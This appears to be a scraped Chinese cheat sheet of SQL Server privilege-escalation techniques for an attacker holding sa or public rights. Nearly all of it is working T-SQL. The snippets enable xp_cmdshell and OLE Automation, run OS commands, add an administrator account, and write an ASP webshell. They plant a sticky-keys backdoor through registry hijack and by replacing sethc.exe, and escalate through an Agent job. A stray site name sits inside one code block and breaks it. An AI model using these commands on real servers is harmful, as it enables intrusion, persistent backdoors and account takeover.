mssql_sa下常用和不常用提权操作大全

   1.

    开启和关毕xp_cmdshell

    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell

    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;-- 关毕xp_cmdshell

    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

    2.

    xp_cmdshell执行命令

    EXEC master..xp_cmdshell 'ipconfig'

    3.

    开启和关毕sp_oacreate

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 开启

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; 关毕

    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

    4.

    sp_OACreate删除文件

    DECLARE @Result int

    DECLARE @FSO_Token int

    EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT

    EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\user.bat'

    EXEC @Result = sp_OADestroy @FSO_Token

    5.

    sp_OACreate复制文件

    declare @o int

    exec sp_oacreate 'scripting.filesystemobject', @o out

    exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

    6.

    sp_OACreate移动文件

    declare @aa int

    exec sp_oacreate 'scripting.filesystemobject', @aa out

    exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log', 'c:\temp\ipmi1.log';

    7.

    sp_OACreate加管理员用户

    DECLARE @js int

    EXEC sp_OACreate 'ScriptControl',@js OUT

    EXEC sp_OASetProperty @js, 'Language', 'JavaScript'

    EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'

    8.

    开启和关毕sp_makewebtask

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE; 开启

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',0;RECONFIGURE; 关毕

    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

    9.

    sp_makewebtask新建文件

    exec sp_makewebtask 'c:\windows.txt',' select ''<%25execute(request("a"))%25>'' ';;--

   10.

    wscript.shell执行命令

    use master

    declare @o int

    exec sp_oacreate 'wscript.shell',@o out

    exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'

    11.

    Shell.Application执行命令

    declare @o int

    exec sp_oacreate 'Shell.Application', @o out

    exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','','1';

    or

    exec sp_oamethod @o, 'ShellExecute',null, 'user.vbs','','c:\','','1';

    12.

    开启和关毕openrowset

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 开启

    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE; 关毕

    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options

    13.

    沙盒执行命令

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 默认为3

    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c echo a>c:\b.txt")')

    14.

    注册表劫持粘贴键

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution

    Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';

    15.

    sp_oacreate替换粘贴键

    declare @o int

    exec sp_oacreate 'scripting.filesystemobject', @o out

    exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

    declare @oo int

    exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

    16.

    public权限提权操作

    USE msdb

    EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com

    @enabled = 1,

    @description = 'This will give a low privileged user access to

    xp_cmdshell',

    @delete_level = 1

    EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',

    @step_name = 'Exec my sql',

    @subsystem = 'TSQL',

    @command = 'exec master..xp_execresultset N''select ''''exec

    master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''

    EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',

    @server_name = 'SERVER_NAME'

    EXEC sp_start_job @job_name = 'GetSystemOnSQL'